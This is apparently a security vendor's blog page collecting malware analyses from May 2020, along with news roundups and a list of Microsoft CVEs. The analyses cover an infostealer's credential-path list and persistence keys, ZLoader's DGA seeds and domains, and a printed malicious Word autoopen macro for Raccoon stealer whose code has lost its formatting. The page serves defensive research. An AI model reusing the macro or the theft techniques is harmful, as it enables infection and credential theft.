Infostealer trojan promises protective mask for Covid-19

/in /by

This week the Sonicwall Capture Labs research team received yet another Trojan capitalizing on the current Covid-19 pandemic. As more and more states require citizens to wear masks in public, it was inevitable that malware authors will leverage on that current event and prey on the anxiety and fears of the global population.

Infection Cycle:

The Trojan arrives in an archive possibly distributed via spam. Within that archive is a file with the following filename:

  • COVID-19_Preventive_Face_Mask.exe

Upon execution, it creates a copy of itself in the following directory:

  • %Appdata%\Roaming\maxfI\maxfI.exe

To ensure persistence it adds the following to the registry:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run   maxfI  %Appdata%\Roaming\maxfI\maxfI.exe

It also adds an erroneous registry data under the VB/VBA Program settings key:

  • HKCU\Software\VB and VBA Program Settings\Ejakulerdipotassicb6\BANNETMUNDENSA   Name: CATHEXISTROPIKLUFTSPHOTOCOLL  Data: Decelerationdi

It then spawns a legitimate windows dotNet file Regasm.exe to continue its malicious activity.

Regasm.exe then peruses the system for internet browsing history, cookies , internet settings, machineGUID among many others and then makes a DNS query to cs58[dot]hostneverdie [dot]com.

It then establishes an encrypted communication to a remote server:

Interestingly the domain bangbor[dot]go[dot]th appears to be a local government website in Thailand. Although the legitimacy of the website cannot be determined, it can only be assumed that it might have been compromised.

It continues to peruse the system for more information such as browser profiles from popular web browsers such as Google Chrome, Firefox, UCBrowser, WaterFox, K-Meleon, Comodo Icedragon. Also looks at possible data on FTP clients such as FTP Navigator,FileZilla and internet mail clients like Rimarts B2 and the Bat!

The following are some of the files that it tried to access:

%AppData%\Local\Google\Chrome\User Data\
%AppData%\Roaming\Mozilla\Firefox\profiles.ini
%AppData%\Local\Microsoft\Edge\User Data
%AppData%\Roaming\Opera Software\Opera Stable
%AppData%\Local\Tencent\QQBrowser\User Data
%AppData%\Local\Tencent\QQBrowser\User Data\Default\EncryptedStorage
%AppData%\Local\MapleStudio\ChromePlus\User Data
%AppData%\Local\Torch\User Data
%AppData%\Local\Yandex\YandexBrowser\User Data
%AppData%\Local\360Chrome\Chrome\User Data
%AppData%\Local\Amigo\User Data
%AppData%\Local\BraveSoftware\Brave-Browser\User Data
%AppData%\Local\CentBrowser\User Data
%AppData%\Local\Chedot\User Data
%AppData%\Local\CocCoc\Browser\User Data
%AppData%\Local\Vivaldi\User Data
%AppData%\Local\CatalinaGroup\Citrio\User Data
%AppData%\Local\liebao\User Data
%AppData%\Local\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
%AppData%\Local\Coowon\Coowon\User Data
%AppData%\Local\Sputnik\Sputnik\User Data
%AppData%\Local\uCozMedia\Uran\User Data
%AppData%\Local\QIP Surf\User Data
%AppData%\Local\Iridium\User Data
%AppData%\Local\Comodo\Dragon\User Data
%AppData%\Local\7Star\7Star\User Data
%AppData%\Local\Elements Browser\User Data
%AppData%\Local\Epic Privacy Browser\User Data
%AppData%\Local\Kometa\User Data
%AppData%\Local\Orbitum\User Data
%AppData%\Roaming\Mozilla\icecat\profiles.ini
%AppData%\Roaming\Mozilla\icecat\profiles.ini
%AppData%\Roaming\Mozilla\SeaMonkey\profiles.ini
%AppData%\Roaming\Mozilla\SeaMonkey\profiles.ini
%AppData%\Roaming\Flock\Browser\profiles.ini
%AppData%\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
%AppData%\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
%AppData%\Roaming\8pecxstudios\Cyberfox\profiles.ini
%AppData%\Roaming\8pecxstudios\Cyberfox\profiles.ini
%AppData%\Roaming\K-Meleon\profiles.ini
%AppData%\Roaming\K-Meleon\profiles.ini
%AppData%\Roaming\Moonchild Productions\Pale Moon\profiles.ini
%AppData%\Roaming\Moonchild Productions\Pale Moon\profiles.ini
%AppData%\Roaming\Waterfox\profiles.ini
%AppData%\Roaming\Waterfox\profiles.ini
%AppData%\Roaming\Comodo\IceDragon\profiles.ini
%AppData%\Roaming\Comodo\IceDragon\profiles.ini
%AppData%\Roaming\Thunderbird\profiles.ini
%AppData%\Roaming\Thunderbird\profiles.ini
%AppData%\Roaming\Postbox\profiles.ini
%AppData%\Roaming\Postbox\profiles.ini
%AppData%\Local\falkon\profiles\profiles.ini
%AppData%\Roaming\Claws-mail\clawsrc
%AppData%\Roaming\Trillian\users\global\accounts.dat
%AppData%\Local\VirtualStore\Program Files\Foxmail\mail\
%AppData%\Local\VirtualStore\Program Files (x86)\Foxmail\mail\
%AppData%\Roaming\Opera Mail\Opera Mail\wand.dat
%AppData%\Roaming\Psi\profiles
%AppData%\Roaming\Psi+\profiles
%AppData%\Roaming\Pocomail\accounts.ini
%AppData%\Roaming\FileZilla\recentservers.xml
%AppData%\Roaming\Ipswitch\WS_FTP\Sites\ws_ftp.ini
%AppData%\Roaming\CoreFTP\sites.idx
%AppData%\Roaming\FTPGetter\servers.xml
%AppData%\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
C:\cftp\Ftplist.txt
C:\FTP Navigator\Ftplist.txt
C:\Program Files\jDownloader\config\database.script
C:\ProgramData\APPDATA\ROAMING\FLASHFXP\3QUICK.DAT

During this crisis, we urge our users to only use official and reputable websites as their source of information and news. Always be vigilant and cautious when installing software programs particularly if you are not certain of the source.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Covid.N_28 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cybersecurity News & Trends – 05-14-20

/0 Comments/in /by

This week, we spotlight 5G conspiracy theorists, government-linked attacks, and two young hackers–one who “saved the internet,” the other an “evil genius.”

SonicWall Spotlight

What are the security priorities for the post-coronavirus world? — Computer Weekly

  • Terry Greer-King, EMEA vice-president at SonicWall, believes the pandemic has accelerated an ongoing transformational shift in cybersecurity, which was driven by the continued adoption of cloud-based resources.

Maintaining Business Continuity in Cyber Threat Environment — CIO Review

  • A Q&A on cybercrimes that have spiked during the current pandemic, the impact on different sectors and recommended strategies for businesses to handle the situation.

Lurking Cyber Threats on Social Media — Dataquest

  • Debasish Mukherjee, VP Regional Sales-APAC at SonicWall, discusses the current threats on social media — including misinformation campaigns, fake profiles, data mining and social engineering — that are posing an increasing threat to users.

Cybersecurity News

Merkel cites ‘hard evidence’ she was targeted by Russian hackers — The Hill

  • German Chancellor Angela Merkel told lawmakers Wednesday that she has seen “hard evidence” of Russia-based hacking attempts targeting her emails and those of the nation’s lawmakers.

The Confessions of Marcus Hutchins, the Hacker Who Saved the Internet — Wired

  • At 22, he single-handedly put a stop to the worst cyberattack the world had ever seen. Then he was arrested by the FBI. This is his untold story.

ProLock Ransomware teams up with QakBot trojan for network access — Bleeping Computer

  • ProLock is a relatively new form of ransomware, but it has quickly attracted attention by targeting businesses and local governments and demanding huge ransoms for file decryption.

Ransomware Reminder: Paying Ransoms Doesn’t Pay — Bank Info Security

  • Still don’t believe that paying the ransoms demanded by cybercriminals is a bad idea? A recent survey presents further proof.

Researchers expose new malware designed to steal data from air-gapped networks — Cyberscoop

  • ESET is hoping publicizing the malware will shake loose clues in their hunt for the enigmatic hackers.

Hackers Target WHO by Posing as Think Tank, Broadcaster — Bloomberg

  • Employees of the World Health Organization have been targeted with coronavirus-related emails purporting to be from news organizations and researchers — but which actually originate with an Iranian hacker group.

U.S. accuses China-linked hackers of stealing coronavirus research — Reuters

  • According to U.S. officials, China-linked hackers are breaking into American organizations researching COVID-19. The report warns scientists and public health officials to be on the lookout for cyber theft.

The 5G Coronavirus Conspiracy Theory Has Taken a Dark Turn — Wired

  • Though social networks have pledged to take more concerted action against conspiracy theories, the 5G hoax has continued to spread, inspiring a surge of attacks.

Sodinokibi ransomware can now encrypt open and locked files — Bleeping Computer

  • The Sodinokibi (REvil) ransomware has added a new feature that makes it easier to encrypt all files, even those that are opened and locked by another process.

Teen Hacker and Crew of ‘Evil Geniuses’ Accused of $24 Million Crypto Theft — Bloomberg

  • An adviser to blockchain companies is claiming a 15-year-old and his crew of “evil computer geniuses” stole $24 million in cryptocurrency from him by hacking into his phone.

In Case You Missed It

Microsoft Security Bulletin Coverage for May 2020

/in /by

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of May 2020. A list of issues reported, along with SonicWall coverage information are as follows:

CVE-2020-0901 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-0909 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-0963 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1010 Microsoft Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1021 Windows Error Reporting Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1023 Microsoft SharePoint Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1024 Microsoft SharePoint Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1028 Media Foundation Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1035 VBScript Remote Code Execution Vulnerability
IPS 14992:VBScript Remote Code Execution Vulnerability (CVE-2020-1035)
CVE-2020-1037 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1048 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1051 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1054 Win32k Elevation of Privilege Vulnerability
ASPY 5938:Malformed-File exe.MP.137
CVE-2020-1055 Microsoft Active Directory Federation Services Cross-Site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-1056 Microsoft Edge Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1058 VBScript Remote Code Execution Vulnerability
IPS 14993:VBScript Remote Code Execution Vulnerability (CVE-2020-1058)
CVE-2020-1059 Microsoft Edge Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1060 VBScript Remote Code Execution Vulnerability
IPS 11663:Suspicious JavaScript/VBScript Code 54
CVE-2020-1061 Microsoft Script Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1062 Internet Explorer Memory Corruption Vulnerability
IPS 14990:Internet Explorer Memory Corruption Vulnerability (CVE-2020-1062)
CVE-2020-1063 Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-1064 MSHTML Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1065 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1066 .NET Framework Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1067 Windows Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1068 Microsoft Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1069 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1070 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1071 Windows Remote Access Common Dialog Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1072 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1075 Windows Subsystem for Linux Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1076 Windows Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1077 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1078 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1079 Microsoft Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1081 Windows Printer Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1082 Windows Error Reporting Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1084 Connected User Experiences and Telemetry Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1086 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1087 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1088 Windows Error Reporting Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1090 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1092 Internet Explorer Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1093 VBScript Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1096 Microsoft Edge PDF Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1099 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1100 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1101 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1102 Microsoft SharePoint Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1103 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1104 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1105 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1106 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1107 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1108 .NET Core Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1109 Windows Update Stack Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1110 Windows Update Stack Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1111 Windows Clipboard Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1112 Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1113 Windows Task Scheduler Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-1114 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1116 Windows CSRSS Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1117 Microsoft Color Management Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1118 Microsoft Windows Transport Layer Security Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1121 Windows Clipboard Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1123 Connected User Experiences and Telemetry Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1124 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1125 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1126 Media Foundation Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1131 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1132 Windows Error Reporting Manager Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1134 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1135 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 5936:Malformed-File exe.MP.136
CVE-2020-1136 Media Foundation Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1137 Windows Push Notification Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1138 Windows Storage Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1139 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1140 DirectX Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1141 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1142 Windows GDI Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1143 Win32k Elevation of Privilege Vulnerability
ASPY 5935:Malformed-File exe.MP.135
CVE-2020-1144 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1145 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1149 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1150 Media Foundation Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1151 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1153 Microsoft Graphics Components Remote Code Execution Vulnerability
ASPY 5937:Malformed-File otf.MP.23
CVE-2020-1154 Windows Common Log File System Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1155 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1156 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1157 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1158 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1161 ASP.NET Core Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1164 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1165 Windows Clipboard Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1166 Windows Clipboard Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1171 Visual Studio Code Python Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1173 Microsoft Power BI Report Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1174 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1175 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1176 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1179 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1184 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1185 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1186 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1187 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1188 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1189 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1190 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1191 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1192 Visual Studio Code Python Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.

ZLoader aka Terdot, DELoader

/in /by

Overview:

SonicWall Capture Labs Threat Research Team has observed and trapped activity for the malware family called “Zeus Sphinx” banking Trojan. Sphinx, goes by many other names; as in ZLoader, Terdot, or DELoader. ZLoader, has resurfaced to take advantage of government relief payments amid COVID-19.

Samples: 3rd Layer, Static Information:

Looking at the third layer in CFF Explorer, checking for corruption. The third layer is a Win32 binary.

Command-Line Static Information:

Unpacking The Sample:

  • 1) The samples strings are highly encrypted and obfuscated. You will need to create your own “IDC” or “Python” plugin inside IDA Pro to decrypt them dynamically.
  • 2) API calls are hidden by dynamically resolving them using function hashes. IDA Pro’s script manual will help you evaluate routines that resolve to Microsoft’s API names.
  • 3) Constant unfolding, dead code insertion and arithmetic substitution via identities.
  • 4) Once the strings are decrypted, the decryption call for string “.com” leads to the DGA routine or you can use your own technique to find it. There is always more than one way to do this step.
  • 5) Understanding the pseudo-random number generator will require you to manually define logical equivalences of small snippets of it’s algorithm for seed generation.

    • The live session below is from Ida Pro, showing Kernel32.dll string decryption:

    The strings below are from the thirty-eight calls to decrypt_string:

    In order to locate the DGA Algorithm, you will have to decrypt all 38 calls to “decrypt_string”, this is why automation is your friend in unpacking this sample.

Seeds:

Seed values used with DGA are as follows: q23Cud3xsNf3, 41997b4a729e1a0175208305170752dd, kZieCw23gffpe43Sd

Domains:

May 08th, 2020, Generated Domain Names:
hctvtocmttbwhpckcjcc.com
aosinfmwfnymlyerbtgk.com
njdnlnmhxwgtqakbeasg.com
lpnueaooqsytsshlbgxn.com
kbebomcngxvckfoudhct.com
yixydgdeovjpgcgbsqxp.com
ntvtwjeedakwwmcexrlj.com
hrihpfdvmhqerbafkucc.com
bnqupgrocpuiouglqqkl.com
irggjkpjmroxljusesjn.com
haymnndsysmtqnjmytsg.com
hlbhbxktyyjrlmixyhwu.com
nevlrqyolqqbqsijrmus.com
hlbdtbxkjvayignolnyi.com
vwcpuyxgvsklhvvlbdtx.com
wfnvuukycdmtaqpxoajk.com
plrpboptbgcyqbqrbsdt.com
koibanoohdjhriuohlbg.com
xvcakbeasgildijbykit.com
junbhxtwqgqcymafwuby.com
jvaxixayhwqnvhrhfijo.com
hckixydsdgcuywdoyopt.com
bgoasrnoptjolgsegewn.com
jcbnrtncovjsywhsyspc.com
cqhdwqnvhnbhxtnyfred.com
qwqxpmihnqevogytstgj.com
nqqwmweecoonfukmtbtg.com
nreumcipiatuuxxekwer.com
bqsmbfvflwsuglpnuirj.com
uqsdhfccnswutkwqkqkh.com
uvjyewrmlmmfvemllajb.com
ykitvkfrehhnuewnjywa.com

Supported Systems:

  • Windows 10
  • Windows 8.1
  • Windows 8.0
  • Windows 7
  • Windows Vista

Summary:

SonicWall, (GAV) Gateway Anti-Virus, provides protection against this threat:

  • GAV: Zloader.A (Trojan)

Appendix:

Sample Hash: 4029f9fcba1c53d86f2c59f07d5657930bd5ee64cca4c5929cbd3142484e815a

Instabot ransomware demands $490 in Bitcoin after 50% discount

/in /by

The SonicWall Capture Labs threat research team have come across new ransomware known to the antivirus community as Instabot.  It is actively spreading and the webserver used by the operators is currently online at the time of writing.  The operators charge $980 in Bitcoin for file recovery but, also offer a 50% discount if payment is made within 72 hours.

Infection Cycle:

The malware uses the following icon:

The malware makes the following DNS request:

  • akbz.top

The malware reports the infection to a remote server.  This includes the public key:

Requests are made to a remote server to download additional malware.  Not all requests were successful:

 

 

 

The following files are added to the filesystem:

  • %APPDATA%\cef8b3be-77de-4842-b1ba-45fe8e197331\{original filename}.exe
  • %APPDATA%\456888e5-7040-4fd5-8f4b-c39f07380640\updatewin1.exe [Detected as: GAV: Instabot.RSM_7 (Trojan) ]
  • %APPDATA%\456888e5-7040-4fd5-8f4b-c39f07380640\updatewin2.exe [Detected as: GAV: Instabot.RSM_8 (Trojan) ]
  • _readme.txt (copied into directories where files were encrypted)

Encrypted files are given a .sqpc extension.

_readme.txt contains the ransom message shown below.  It demands $490 USD for file recovery after a 50% discount:

We reached out to the operators via email and received the following response:

In the email message, a link to a video demonstrating how to use the decryption tool is provided.  The following are some screenshots from the video:

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Instabot.RSM_7 (Trojan)
  • GAV: Instabot.RSM_8 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cybersecurity News & Trends – 05-07-20

/0 Comments/in /by

This week, healthcare continues to be in the crosshairs and ransomware-for-hire continues to mean big paydays for cybercriminals.

SonicWall Spotlight

Hackers Are Calling In The Raccoons — Fudzilla

  • Hackers are exploiting anxiety around Covid-19 to create new hooks for their malware, such as the new Raccoon Stealer variant uncovered by SonicWall’s Threat Research team

SonicWall Called Upon by Health Giant GNC to Rapidly Provide Protection of Remote, Mobile Workforce — CXOToday

  • SonicWall and GNC Holdings (GNC), a leading global health and wellness brand, are working closely to increase capacity of the company’s existing Secure Mobile Access (SMA) deployment to connect and secure the company’s growing volume of work-from-home employees.

Web-applications Attacks, Including SQL Injection Attacks, More Than Doubled In 2019, According To Data From Sonicwall — Security Boulevard

  • What is an SQL injection attack? How common are they? And why are they so devastating? Security Boulevard weighs in on these nefarious attacks, and gives tips on how to prevent them.

Cybersecurity News

It Has Been 20 Years Since Cybercrime Woke Up To Social Engineering With An Intriguing Little Email Titled ‘ILOVEYOU’ — The Register

  • Two decades have passed since cybercrooks demonstrated the role exploiting human psychology could play in spreading malware.

10 Questions With Tech Data Security Guru Alex Ryals On Security Trends And Training In Isolation — CRN

  • Learning about cybersecurity has never been more important — but with an abundance of styles and modules to choose from, it’s also never been easier.

Cyber-spies seek coronavirus vaccine secrets — BBC

  • The U.S. has seen foreign spy agencies carry out reconnaissance of research into a coronavirus vaccine, a senior U.S. intelligence official told the BBC — and similar reports have come from the UK as well.

Healthcare Targeted By More Attacks But Less Sophistication — Dark Reading

  • An increase in attacks targeting healthcare organizations suggests that perhaps new cybercriminals are getting into the game.

Sodinokibi, Ryuk ransomware drive up average ransom to $111,000 — Bleeping Computer

  • The first quarter of the year saw a 33% increase of the average amount ransomware operators demand from their victims compared to the previous quarter.

LockBit, the new ransomware for hire: a sad and cautionary tale — Ars Technica

  • A ransomware infection involving a recent strain called LockBit ransacked one company’s poorly secured network in a matter of hours, leaving leaders no viable choice other than to pay the ransom.

New Kaiji Botnet Targets IoT, Linux Devices — Threat Post

  • The botnet uses SSH brute-force attacks to infect devices and a custom implant written in the Go Language.

Phishing Attacks Against Banks Jump With Pandemic Used as Lure — Bloomberg

  • Cyber-attacks trying to trick bank employees into clicking on malicious links jumped in the first quarter, with criminals attempting to take advantage of fear and confusion caused by the coronavirus pandemic, Bloomberg reports.

SilverTerrier BEC scammers target US govt healthcare agencies — Bleeping Computer

  • Government healthcare agencies, COVID-19 response organizations, and medical research facilities from across the globe were the targets of Business Email Compromise (BEC) phishing campaigns coordinated by multiple Nigerian BEC actors during the last three months.

In Case You Missed It

Projectzorgo ransomware actively spreading in the wild

/in /by

The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of PROJECTZORGO ransomware [PROJECTZORGO.RSM] actively spreading in the wild.

The PROJECTZORGO ransomware has been specially designed by a team of underground hackers for bad intentions. The ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

This cyber-criminal group has been active since November 2019 based on their Twitter account.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • % App.path%\ TXT
      • Instruction for recovery
    • %App.path%\ [Name]. <Projectzorgo>

Once the computer is compromised, the ransomware runs the following commands:

The ransomware encrypts all the files and appends the [Projectzorgo]  extension onto each encrypted file’s filename. It is capable of targeting various file formats such as .exe, .jpeg, .docx,.mp3, .pdf, .html, and others that can make those files useless.

After encrypting all personal documents, the ransomware shows the following text file containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: PROJECTZORGO.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Latest variant v1.5 of racoon stealer used in COVID-19 phishing campaign

/in /by

SonicWall Capture Labs Threat Research team has come across a new variant of Raccoon stealer (V1.5) that was used in a malicious COVID-19 campaign. While we wear masks to defend against coronavirus, a bandit masked raccoon seeks to take advantage of the coronavirus outbreak.

Infection Cycle

As with several other attacks, this campaign starts with a phishing email pretending to contain information on how to deal with the outbreak of Covid-19. To find more detail, it encourages the user to open the attached file “COVID-19 stop.zip”.

The attached Zip archive has a Microsoft document in Office Open XML format. On opening the document, the below text is shown, attempting to deceive the user to enable editing and allow content to update windows to correct the application.

This document contains embedded malicious macro code that executes when macro content is enabled. These VB macros are password-protected, in an effort to bypass detection and thwart analysis.

VBAProject has the following modules in it.

VBA Module creates folder named NTcore and batch file named easy.cmd inside NTcore.
Attribute VB_Name = “Module1”
Public obj3
Public Sub App_Hard_Wait_DoEvents(dblSeconds As Double)
If dblSeconds = 0 Then Exit Sub
Dim varStart As Variant
varStart = Timer
Do While Timer < (varStart + dblSeconds)DoEvents
LoopResolution6
With Application
.ScreenUpdating = False’Loop Through open documents
Do Until .Documents.Count = 0
‘Close no saveResolution8
.Documents(1).Close SaveChanges:=wdDoNotSaveChanges
Loop’Quit Word no save
.Quit SaveChanges:=wdDoNotSaveChanges
End WithEnd SubSub SetIndentLevel()
Selection.Range.Paragraphs.Alignment = Word.WdParagraphAlignment.wdAlignParagraphLeft
Selection.Range.Paragraphs.LeftIndent = Application.InchesToPoints(4.5)
End SubPublic Function MakeFolder(ByVal pathToCreate As String) _
As Boolean
Dim sSomePath As String
Dim bAns As BooleansSomePath = pathToCreate
If CreatePath(sSomePath) = True Then
bAns = True
Else
bAns = False
End If
MakeFolder = bAns
End FunctionPrivate Function CreatePath(NewPath) As Boolean
Dim sPath As String
‘Add a trailing slash if none
sPath = NewPath & IIf(Right$(NewPath, 1) = “\”, “”, “\”)’Call API
If MakeSureDirectoryPathExists(sPath) <> 0 ThenDim hExportFile, nWritten
Dim stringToWrite As String
hExportFile = CreateFile(“c:\NTcore\easy.cmd” _
, GENERIC_WRITE _
, 0 _
, 0 _
, OPEN_ALWAYS _
, FILE_ATTRIBUTE_NORMAL _
, 0 _
)
stringToWrite = Sample1.Label1.Caption
stringToWrite = stringToWrite & Sample1.Label2.Caption
stringToWrite = stringToWrite & Sample1.Label3.Caption
stringToWrite = stringToWrite & Sample1.Label4.Caption
stringToWrite = stringToWrite & Sample1.Label5.Caption
stringToWrite = stringToWrite & Sample1.Label6.Caption
stringToWrite = stringToWrite & Sample1.Label7.Caption
stringToWrite = stringToWrite & Sample1.Label8.Caption
WriteFile hExportFile, ByVal stringToWrite, Len(stringToWrite), nWritten, 0CloseHandle hExportFileCall App_Hard_Wait_DoEvents(3)’No errors, return True
CreatePath = True
End If
End Function
Sub autoopen()
On Error Resume Next
SetIndentLevel
Make Folder C hr(99) + C hr(58) + C hr(92) + C hr(78) + Chr(84) + C hr(99) + C hr(111) + C hr(114) + C hr(101)
End Sub

